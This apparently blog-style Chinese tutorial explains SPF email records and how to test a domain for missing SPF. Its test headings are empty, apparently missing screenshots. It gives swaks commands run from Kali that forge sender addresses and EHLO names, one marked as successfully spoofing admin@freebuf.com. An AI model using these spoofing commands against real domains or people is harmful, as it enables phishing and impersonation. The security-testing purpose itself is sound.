• SPF是 Sender Policy Framework 的缩写,一种以IP地址认证电子邮件发件人身份的技术,是为了防范垃圾邮件而提出来的一种DNS记录类型,它是一种TXT类型的记录。 接收邮件方会首先检查域名的SPF记录,来确定发件人的IP地址是否被包含在SPF记录里面,如果在,就认为是一封正确的邮件,否则会认为是一封伪造的邮件进行退回。
• SPF可以防止别人伪造你来发邮件,是一个反伪造性邮件的解决方案。当你定义了你域名的SPF记录之后, 接收邮件方会根据你的SPF记录来确定连接过来的IP地址是否被包含在SPF记录里面,如果在,则认为是一封正确的邮件,否则则认为是一封伪造的邮件。
设置正确的 SPF 记录可以提高邮件系统发送外域邮件的成功率,也可以一定程度上防止别人假冒你的域名发邮件。
测试方法:
Windows不存在漏洞的时候:
存在漏洞的时候:
Linux存在漏洞的时候:
不存在漏洞的时候:
基本用法:
基本用法
-- to <收件人的邮箱>
-- from <要显示的发件人邮箱>
-- ehlo <伪造的邮件ehlo头>
-- body <邮件正文>
-- header <邮件头信息,subject为邮件标题>
配置SPF:
root@kali:~# swaks --to xxxxxxxxx@qq.com --from admin@qq.com --ehlo qq.com --body hello --header "Subject: hello"
伪造失败
伪造成功:
root@kali:~# swaks --to xxxxxxxxx@qq.com --from admin@freebuf.com --ehlo csdn.com --body hello --header "Subject: hello" //成功发送
浙公网安备 33010602011771号